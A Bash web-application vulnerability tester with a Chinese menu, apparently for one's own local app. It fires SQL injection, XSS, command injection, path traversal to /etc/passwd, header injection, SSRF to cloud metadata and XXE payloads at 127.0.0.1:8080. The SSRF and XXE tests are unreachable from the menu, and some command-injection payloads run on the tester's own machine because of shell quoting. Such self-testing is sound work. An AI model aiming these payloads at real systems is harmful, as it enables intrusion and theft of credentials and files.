#!/bin/bash

# 显示菜单
function show_menu() {
    clear
    echo "======================================"
    echo "  Web应用安全测试工具 (127.0.0.1:8080)"
    echo "======================================"
    echo "1. SQL注入攻击测试"
    echo "2. XSS攻击测试"
    echo "3. 命令注入测试"
    echo "4. 目录遍历测试"
    echo "5. HTTP头注入测试"
    echo "6. 退出"
    echo "======================================"
    echo -n "请选择测试类型 [1-6]: "
}

# SQL注入测试
function sql_injection_test() {
    echo -e "\n开始SQL注入测试..."
    
    # 常见的SQL注入payloads
    payloads=(
    	"' OR '1'='1'"
        "' OR '1'='1"
        "' OR 1=1 --"
        "admin' --"
        "admin' #"
        "admin'/*"
        "' UNION SELECT null, username, password FROM users--"
        "' UNION SELECT 1,2,3,4,5,6--"
        "' AND 1=CONVERT(int, (SELECT table_name FROM information_schema.tables))--"
    )
    
    # 测试URL参数
    url="http://127.0.0.1:8080/login"
    
    for payload in "${payloads[@]}"; do
        echo -e "\n测试payload: $payload"
        response=$(curl -s -G --data-urlencode "username=$payload" --data-urlencode "password=test" "$url")
        
        # 检查响应中是否可能包含SQL错误或异常
        if [[ "$response" =~ "SQL" || "$response" =~ "syntax" || "$response" =~ "error" ]]; then
            echo -e "\033[31m[漏洞可能存在] 服务器返回了SQL错误信息\033[0m"
        else
            echo -e "\033[32m[未检测到明显漏洞]\033[0m"
        fi
    done
    
    read -p "按回车键返回菜单..."
}

# XSS测试
function xss_test() {
    echo -e "\n开始XSS攻击测试..."
    
    # 常见的XSS payloads
    payloads=(
        "<script>alert('XSS')</script>"
        "<img src=x onerror=alert('XSS')>"
        "\"><script>alert('XSS')</script>"
        "javascript:alert('XSS')"
        "<svg/onload=alert('XSS')>"
        "<body onload=alert('XSS')>"
    )
    
    # 测试URL参数
    url="http://127.0.0.1:8080/search"
    
    for payload in "${payloads[@]}"; do
        echo -e "\n测试payload: $payload"
        response=$(curl -s -G --data-urlencode "query=$payload" "$url")
        
        # 检查响应中是否包含未转义的payload
        if [[ "$response" =~ "$payload" ]]; then
            echo -e "\033[31m[漏洞可能存在] 输入未正确转义\033[0m"
        else
            echo -e "\033[32m[未检测到明显漏洞]\033[0m"
        fi
    done
    
    read -p "按回车键返回菜单..."
}

# 命令注入测试
function cmd_injection_test() {
    echo -e "\n开始命令注入测试..."
    
    payloads=(
        ";ls"
        "|id"
        "&& whoami"
        "$(cat /etc/passwd)"
        "`uname -a`"
    )
    
    url="http://127.0.0.1:8080/execute"
    
    for payload in "${payloads[@]}"; do
        echo -e "\n测试payload: $payload"
        response=$(curl -s -G --data-urlencode "cmd=$payload" "$url")
        
        if [[ "$response" =~ "root:" || "$response" =~ "bin/" ]]; then
            echo -e "\033[31m[漏洞可能存在] 系统命令被执行\033[0m"
        else
            echo -e "\033[32m[未检测到明显漏洞]\033[0m"
        fi
    done
    
    read -p "按回车键返回菜单..."
}

# 目录遍历测试
function dir_traversal_test() {
    echo -e "\n开始目录遍历测试..."
    
    payloads=(
        "../../../../etc/passwd"
        "%2e%2e%2fetc%2fpasswd"
        "..%5c..%5c..%5cwindows%5cwin.ini"
    )
    
    url="http://127.0.0.1:8080/download"
    
    for payload in "${payloads[@]}"; do
        echo -e "\n测试payload: $payload"
        response=$(curl -s -G --data-urlencode "file=$payload" "$url")
        
        if [[ "$response" =~ "root:" || "$response" =~ "[extensions]" ]]; then
            echo -e "\033[31m[漏洞可能存在] 敏感文件被读取\033[0m"
        else
            echo -e "\033[32m[未检测到明显漏洞]\033[0m"
        fi
    done
    
    read -p "按回车键返回菜单..."
}

# HTTP头注入测试
function header_injection_test() {
    echo -e "\n开始HTTP头注入测试..."
    
    payloads=(
        "User-Agent: <script>alert(1)</script>"
        "Referer: javascript:alert(1)"
    )
    
    url="http://127.0.0.1:8080/admin"
    
    for payload in "${payloads[@]}"; do
        header_name=$(echo "$payload" | cut -d':' -f1)
        header_value=$(echo "$payload" | cut -d':' -f2-)
        echo -e "\n测试payload: $payload"
        response=$(curl -s -G -H "$header_name: $header_value" "$url")
        
        if [[ "$response" =~ "$header_value" ]]; then
            echo -e "\033[31m[漏洞可能存在] 头注入未过滤\033[0m"
        else
            echo -e "\033[32m[未检测到明显漏洞]\033[0m"
        fi
    done
    
    read -p "按回车键返回菜单..."
}

# SSRF测试
function ssrf_test() {
    echo -e "\n开始SSRF测试..."
    
    payloads=(
        "http://169.254.169.254/latest/meta-data/"
        "file:///etc/passwd"
        "gopher://127.0.0.1:6379/_INFO"
    )
    
    url="http://127.0.0.1:8080/fetch"
    
    for payload in "${payloads[@]}"; do
        echo -e "\n测试payload: $payload"
        response=$(curl -s -G --data-urlencode "url=$payload" "$url")
        
        if [[ "$response" =~ "AMI ID" || "$response" =~ "root:" || "$response" =~ "redis_version" ]]; then
            echo -e "\033[31m[漏洞可能存在] SSRF成功\033[0m"
        else
            echo -e "\033[32m[未检测到明显漏洞]\033[0m"
        fi
    done
    
    read -p "按回车键返回菜单..."
}

# XXE注入测试
function xxe_test() {
    echo -e "\n开始XXE注入测试..."
    
    payload='<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
    echo -e "\n测试payload: $payload"
    
    response=$(curl -s -X POST -H "Content-Type: application/xml" --data "$payload" "http://127.0.0.1:8080/xml")
    
    if [[ "$response" =~ "root:" ]]; then
        echo -e "\033[31m[漏洞可能存在] XXE成功\033[0m"
    else
        echo -e "\033[32m[未检测到明显漏洞]\033[0m"
    fi
    
    read -p "按回车键返回菜单..."
}




# 主循环
while true; do
    show_menu
    read choice
    
    case $choice in
        1) sql_injection_test ;;
        2) xss_test ;;
        3) cmd_injection_test ;;
        4) dir_traversal_test ;;
        5) header_injection_test ;;
        6) echo "退出程序..."; exit 0 ;;
        *) echo "无效选择,请重新输入"; sleep 1 ;;
    esac
done
